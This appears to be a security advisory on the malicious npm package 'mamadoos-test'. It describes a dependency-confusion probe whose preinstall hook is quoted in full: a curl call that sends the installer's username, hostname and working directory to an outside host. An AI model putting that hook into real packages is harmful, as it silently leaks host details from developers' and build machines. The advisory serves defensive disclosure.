VYPR

npm · Malicious package advisory

Malware

mamadoos-test

MAL-2026-4605

Malicious code in mamadoos-test (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)
package.json declares a preinstall lifecycle hook that runs `curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd)`, embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on `npm install` with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency (`mamadoos-test: ^10.0.0`), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).

Compromised versions (3)

  • 10.1.0
  • 11.0.0
  • 10.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.